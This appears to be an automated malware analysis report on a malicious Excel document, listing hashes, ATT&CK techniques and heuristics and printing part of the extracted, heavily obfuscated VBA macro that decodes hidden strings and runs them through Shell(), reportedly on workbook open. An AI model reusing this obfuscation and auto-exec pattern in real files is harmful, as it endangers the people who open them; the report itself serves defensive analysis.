Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 84e0ad7ed9101854…

MALICIOUS

Office (OLE)

Size: 68.0 KB
Created: 2015-06-05 18:17:20
Authoring application: Microsoft Excel
First seen: 2020-09-15
MD5: d469be953d3b937753612284fabcbf67
SHA-1: a3d495e8109c1b360e2517273091efa962af517b
SHA-256: 84e0ad7ed9101854369ec11f5b02f21f0db3d20c7681b19e7b1df0f3bbf4a4ff
Risk Score: 120

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1203 Exploitation for Client Execution

The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macros. The 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic further specifies that this execution occurs via the Workbook_Open event, which is a common technique for macro-based malware. The reconstructed command 'Shell (L)', where L is assembled at runtime by concatenating five string fragments decoded by the macro's own decoding function, suggests that the macro attempts to execute an external process, likely a downloader for a second-stage payload.

Heuristics (3)

  • OLE_VBA_MACROS (medium; 2 related findings): VBA macros detected
    Document contains VBA macro code
  • OLE_VBA_SHELL (critical): Shell() call in VBA
  • OLE_VBA_PCODE_AUTOEXEC_EXEC (high): VBA p-code auto-exec with execution tokens
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 20269 bytes
SHA-256: d710de002f845c178bc6fb13e3df948eb491dafc085daa927cc3b482623f66e6
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
Sub hadbnzxbcmqi()



L1 = yHmorma0S("W †”¡ hvvr8--h,", "fJNDKu77e")
L2 = yHmorma0S("Óð/", "JJTC4n7Od")
L3 = yHmorma0S("Γg", "ZOUA3UxdQ")
L4 = yHmorma0S("‡²Û Ðízzaxz", "OWPTbLVbT")
L5 = yHmorma0S("·àctW 65qhx0q", "AsCAhBTU7")
L = L1 + L2 + L3 + L4 + L5
Shell (L)
End Sub
Public Function yHmorma0S(ByVal rDfr8WJTg As String, ByVal lcxx7AFpZ As String) As String
On Error Resume Next
Dim hcpoBNaQm(0 To 255) As Integer, second As Integer, third As Long, fourth() As Byte
GoTo zkqyOpoEuxpNrV:
RIVgOOCoPmMuLxBcPMGZQtOnt:
gSuPOrZqcgFgrlDAY = "RJGRjSGPoiL"
GoTo BESoqzJEixPkDnScdbgQJQvIHYbe
sAqVffdiFMTy:

GoTo KaehZxMFpQauQbpmU
HHjrDgzfCUu:
yRLBhqqotfYfJVV = "pskIQAilFimAKg"
GoTo gascyityvGYmuvEdQACj
uJCnUQrTZmwRfSEgCBdKNRsEPJcZvR:
HaLPpebUnkGdBHD = "ShCDNQRvL"
GoTo ieqHVrfoLGkmS
BESoqzJEixPkDnScdbgQJQvIHYbe:
yRLBhqqotfYfJVV = "pskIQAilFimAKg"
GoTo uJCnUQrTZmwRfSEgCBdKNRsEPJcZvR
zkqyOpoEuxpNrV:
zivUUwFRtNsQjIjuoG = "MwGMUlAHJSqlQxDQfTzvv"
GoTo QhNTnvkQLLKPAAfFrHKNFeHmVRG
ieqHVrfoLGkmS:
fourth() = StrConv(lcxx7AFpZ, vbFromUnicode)
GoTo sAqVffdiFMTy
gascyityvGYmuvEdQACj:
gSuPOrZqcgFgrlDAY = "RJGRjSGPoiL"
GoTo IQGmhiglVdkAb
rhjbAdHFnc:
zivUUwFRtNsQjIjuoG = "MwGMUlAHJSqlQxDQfTzvv"
GoTo BqKArFPyylmMViKeIhzzwqIFdMQdZlBCYajG
QhNTnvkQLLKPAAfFrHKNFeHmVRG:
uOTcRxGGFJhovammBFI = "LbSDnHkp"
GoTo RIVgOOCoPmMuLxBcPMGZQtOnt
IQGmhiglVdkAb:
uOTcRxGGFJhovammBFI = "LbSDnHkp"
GoTo rhjbAdHFnc
KaehZxMFpQauQbpmU:
HaLPpebUnkGdBHD = "ShCDNQRvL"
GoTo HHjrDgzfCUu

BqKArFPyylmMViKeIhzzwqIFdMQdZlBCYajG:
For second = 0 To 255
GoTo jyCFwVleNvySzNJtGggGPcEYDb:
TdAvZbHNhpfKFGEJuBI:
vPsxKUqDrdEbaBjAm = "QqCw"
GoTo zzOFHzZBgeLAULCPbJIw
RwhdQlcShraZMawIQEVIMmaYRkhD:
    third = (third + hcpoBNaQm(second) + fourth(second Mod Len(lcxx7AFpZ))) Mod 256
GoTo kqmyBPlnwGBeuMhAuk
dxCKAgppotPQeIUlorjHQPzikEhmzwfsRR:
LQopKLVtaDSzFZhQCxy = "BmgnQstx"
GoTo BOqJpNfFgrlDmI
BOqJpNfFgrlDmI:
rQtYIEsNDuISBBobBY = "lSkVaAolfxRnLRN"
GoTo DJFQixEFPniLNt
DJFQixEFPniLNt:
drMOYidGVoIcVLr = "AzEpiphgwzCuSibK"
GoTo TcQwssqvhnuLmlB
kqmyBPlnwGBeuMhAuk:
    hcpoBNaQm(second) = second
GoTo ZZYdNGNsFEUYbSrGzjToQVjtOcPBdzyaHZKOpaTmjGcAtpARgBpzQRv
jyCFwVleNvySzNJtGggGPcEYDb:
LiDcUQctIeQbytQZEZf = "OuCDBGelsQ"
GoTo TdAvZbHNhpfKFGEJuBI
zzOFHzZBgeLAULCPbJIw:
drMOYidGVoIcVLr = "AzEpiphgwzCuSibK"
GoTo YgsUoTrJVJHBTQQinkvMNjktRy
rYexFvbVQUKDLpQBRVYP:
LQopKLVtaDSzFZhQCxy = "BmgnQstx"
GoTo RwhdQlcShraZMawIQEVIMmaYRkhD
TcQwssqvhnuLmlB:
vPsxKUqDrdEbaBjAm = "QqCw"
GoTo umKnSQynHxoCM
YgsUoTrJVJHBTQQinkvMNjktRy:
rQtYIEsNDuISBBobBY = "lSkVaAolfxRnLRN"
GoTo rYexFvbVQUKDLpQBRVYP
ZZYdNGNsFEUYbSrGzjToQVjtOcPBdzyaHZKOpaTmjGcAtpARgBpzQRv:

GoTo dxCKAgppotPQeIUlorjHQPzikEhmzwfsRR
umKnSQynHxoCM:
LiDcUQctIeQbytQZEZf = "OuCDBGelsQ"
GoTo StEyQAQGRQSfwK

StEyQAQGRQSfwK:
Next second
GoTo LeDepjBkHrBHDgvCENlgJLsyRaPvqqp:
HAkSUpRVkhPdCC:

GoTo mybuayPqPbnQtdouqBShpqAYSwxekD
EcuGurlDBYHRYTgxxTUejMcIOiqgLGHFKvov:
AdhvFbobNpLJmTlbAbmgyvSoMEBMesNBKje = "IpJOQMsBAFcjq"
GoTo AmCFIAaChRBVMDQbKJxjKhtHpGsw
QJNnNZSliEbzrnzP:
gDkNeKQkshMIIHLxqxcC = "PTQOnQfbPka"
GoTo AoxUPtvcvBJenomrOUdGTSjnph
LeDepjBkHrBHDgvCENlgJLsyRaPvqqp:
ihxADvTjcLuwQtyLIrEe = "FNCV"
GoTo EcuGurlDBYHRYTgxxTUejMcIOiqgLGHFKvov
BhcdbgQYfvQVmceVvY:
fpYYKxZuHVDUGKkZVPif = "YwCyKNxz"
GoTo AjQsiZnxggSSuCPrqOgsgeYqnJtEKGRjk
GQoUyNuBTcRxstrw:
AdhvFbobNpLJmTlbAbmgyvSoMEBMesNBKje = "IpJOQMsBAFcjq"
GoTo biMnYosvmLo
AoxUPtvcvBJenomrOUdGTSjnph:
fourth() = StrConv(rDfr8WJTg, vbFromUnicode)
GoTo HAkSUpRVkhPdCC
AjQsiZnxggSSuCPrqOgsgeYqnJtEKGRjk:
SMqGZtMGwcllkoaSaEQ = "hknfDSLvd"
GoTo GQoUyNuBTcRxstrw
mybuayPqPbnQtdouqBShpqAYSwxekD:
gDkNeKQkshMIIHLxqxcC = "PTQOnQfbPka"
GoTo BhcdbgQYfvQVmceVvY
biMnYosvmLo:
ihxADvTjcLuwQtyLIrEe = "FNCV"
GoTo fmtJkjzpskImQOlFwnAKtthhHQdF
AmCFIAaChRBVMDQbKJxjKhtHpGsw:
SMqGZtMGwcllkoaSaEQ = "hknfDSLvd"
GoTo KICURoJjolwzOkluEzdsfytiNQYVbLELqDCSQQqFxiPRmOThsMaNzbxwY
KICURoJjolwzOkluEzdsfytiNQYVbLELqDCSQQqFxiPRmOThsMaNzbxwY:
fpYYKxZuHVDUGKkZVPif = "YwCyKNxz"
GoTo QJNnNZSliEbzrnzP

fmtJkjzpskImQOl
... (truncated)